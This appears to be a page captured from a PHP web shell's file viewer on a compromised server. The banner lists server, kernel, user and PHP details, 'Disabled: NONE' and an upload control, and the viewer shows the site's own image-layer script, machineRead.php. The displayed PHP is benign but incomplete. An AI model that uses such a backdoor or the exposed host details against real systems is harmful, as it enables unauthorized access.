( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/../tmpr/..//includes/machineRead.php
<?php 					$row = $db ->getEachLayer($msg_id,$catalogidX,$layerPosition);
			 			$str =$row[0]['name'];	
					 $name =$row[0]['name'];	
			 
  						$check = $db-> checkTypeA($str);
 
					if($check=="theGraphics")
					{ 
					/*$str = str_replace(".png","",basename($str));
					$background = gd_apply_overlay($background, $str, 100);*/
					} 
					if($check=="profilePicture")
					{ 
					/* $picme=profilepicture();
					  $x =$layer1x; $y=$layer1y; $w=$layer1w; $h=$layer1h; 
					  $background = gd_apply_logo($background, $picme, 100,$x,$y,$w,$h);*/
					} 
					if($check=="theUpdate")
					{ 
					 $str =$row['name'];
					 
					 		$str = str_replace('?', '&', $str);
							parse_str($str, $output);
 								                $route=$output['route'];/*exit($route);*/
							$fontid=$output['fontid'];
							$myfont=$output['myfont'];
							$fontcatalogid=$output['fontcatalogid'];
							$themeid=$output['themeid'];
							$font_Username=$output['font_Username'];
							$font_Name=$output['font_Name'];
							$font_Url=$output['font_Url'];
							$font_Text=$output['font_Text'];
							$text_w=$output['text_w'];
							$text_h=$output['text_h'];
							$text_x=$output['text_x'];
							$text_y=$output['text_y'];
							$text_align=$output['text_align'];
							$text_size=$output['text_size']-5;
							$text_color=$output['text_color'];
							$url_color=$output['url_color'];
							$name_color=$output['name_color'];
							$username_color=$output['username_color'];
							$url_size=$output['url_size'];
							$name_size=$output['name_size'];
							$username_size=$output['username_size'];
							$text_pad=$output['text_pad'];
							$text_line_height=$output['text_line_height'];
							$text=$output['text'];
							$layer_x=$row['layerx'];
                            	
						$angle = 0;
						$underline = true;
						/*$font_Text =   "assets/fonts/$font_Text";*/ //font used
					   
						$backgroundWidth = 500;
						$backgroundHeight = 600;
						 
					 
 
					 
		

					} 

					if($check=="theUrl")
					{ 
					 $str =$row['name'];
					 		$str = str_replace('?', '&', $str);
							parse_str($str, $output);
 								                $route=$output['route'];/*exit($route);*/
							
							$fontid=$output['fontid'];
							$myfont=$output['myfont'];
							$fontcatalogid=$output['fontcatalogid'];
							$themeid=$output['themeid'];
							$font_Username=$output['font_Username'];
							$font_Name=$output['font_Name'];
							$font_Url=$output['font_Url'];
							$font_Text=$output['font_Text'];
							$text_w=$output['text_w'];
							$text_h=$output['text_h'];
							$text_x=$output['text_x'];
							$text_y=$output['text_y'];
							$text_align=$output['text_align'];
							$text_size=$output['text_size']-5;
							$text_color=$output['text_color'];
							$url_color=$output['url_color'];
							$name_color=$output['name_color'];
							$username_color=$output['username_color'];
							$url_size=$output['url_size'];
							$name_size=$output['name_size'];
							$username_size=$output['username_size'];
							$text_pad=$output['text_pad'];
							$text_line_height=$output['text_line_height'];
							
							$layer_x=$row['layerx'];
							$layer_y=$row['layery'];
 						$angle = 0;
						$underline = true;
						/*$font_Text =   "assets/fonts/$font_Text"; *///font used
					   
						$backgroundWidth = 600;
						$backgroundHeight = 600;
 
									} 
					if($check=="theName")
					{ 
					 $str =$row['name'];
					 		$str = str_replace('?', '&', $str);
							parse_str($str, $output);
 								                $route=$output['route'];/*exit($route);*/
												 $layer1 =$row['name'];
							$fontid=$output['fontid'];
							$myfont=$output['myfont'];
							$fontcatalogid=$output['fontcatalogid'];
							$themeid=$output['themeid'];
							$font_Username=$output['font_Username'];
							$font_Name=$output['font_Name'];
							$font_Url=$output['font_Url'];
							$font_Text=$output['font_Text'];
							$text_w=$output['text_w'];
							$text_h=$output['text_h'];
							$text_x=$output['text_x'];
							$text_y=$output['text_y'];
							$text_align=$output['text_align'];
							$text_size=$output['text_size']-5;
							$text_color=$output['text_color'];
							$url_color=$output['url_color'];
							$name_color=$output['name_color'];
							$username_color=$output['username_color'];
							$url_size=$output['url_size'];
							$name_size=$output['name_size'];
							$username_size=$output['username_size'];
							$text_pad=$output['text_pad'];
							$text_line_height=$output['text_line_height'];
							
							$layer_x=$row['layerx'];
							$layer_y=$row['layery'];
                           
                           	 
							$angle = 0;
							$underline = true;
							/*$font_Text =   "assets/fonts/$font_Text";*/ //font used
						   
							$backgroundWidth = 600;
							$backgroundHeight = 600;
						 
					 
 					} 

					if($check=="Uploaded")
					{
				
				 
					
	 
	 	 
	} 
		?>